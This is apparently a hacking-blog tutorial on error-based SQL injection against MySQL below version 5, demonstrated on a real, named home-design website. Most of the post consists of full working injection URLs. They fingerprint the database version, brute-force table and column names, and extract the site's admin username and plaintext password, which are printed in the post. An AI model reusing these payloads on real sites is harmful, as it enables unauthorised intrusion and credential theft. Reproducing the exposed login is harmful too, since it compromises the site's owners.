SQL INJECTION WHERE THE VERSION IS LESS THAN 5.
Last time, :D Today i’m going to teach you how to inject a website, that has version less than 5.
As example,i’m taking this site.
http://www.ultimatehomedesign.com/news-detail.php?id=312
NOTE : Don’t step ahead if you don’t know UNION BASED Sql injection.
Getting Version
Now,lets check the version with error based query.
+or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1–
Version : Duplicate entry ’4.1.22-standard~1′ for key 1
Getting Tables
This site don’t have information_schema . The version is less than 5. We have to guess the table names.
This should be our syntax to guess the tables.
or+1+group+by+concat_ws(0x7e,(select+1+from+ Guess_table +limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–Now he we have to guess table name with this syntax. Some tables that usuallycontains login data :
admin
amdinstator
tbl_admin
tbl_adminstator
login
member
user
users
table_users
settings
Now i’m trying to guess table name with the syntax.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
I tried to guess admin table. There is no table in the database named
admin .
So error came up :
Table ‘uhd.admin’ doesn’t exist
Lets try to guess another table.
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Again error came up. There is no table in the database named adminstator
So error came up :
Table ‘uhd.adminstator’ doesn’t exist
Lets try with another table :
http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
So users table exists.
No error came up :
Duplicate entry ’1~1′ for key 1
Getting Columns
Now,we have to guess column name. So syntax to get columns should be like this:
+or+1+group+by+concat_ws(0x7e,(select+ column_name +from+ table_name +limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–Username is the most common table. Lets try with it.
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Error came up. The column doesn’t exist
Unknown column ‘username’ in ‘field list’
Lets try to guess another column user_name .
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Now the site loads good. That means user_name exists.
Now try to guess the password column. Lets try with user_pass .
http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Extracting data from columns
To get data from columns,our syntax should be this :
or+1+group+by+concat_ws(0x7e,(select+concat( column_name ,0x7e, column_name )+from+ table_name +limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–
Some times, this query don’t works,as this query don’t works on this site. We have to use substring.
Getting Username:
www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)
With this subtrinquery function we can combine a complex question. This query attempts to retrieve the name database of a database table. One character at a time. The substing function will return the first character of query’s result
The username cames up in the query :
Duplicate entry ‘root~1′ for key 1
Getting Password
:
http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)Password came up :
Duplicate entry ‘trump123~1′ for key 1
Hope you learned something. :D Okay Mates, Stay Tuned For the Next Tutorial OF SQL injection :D
0 comments:
Post a Comment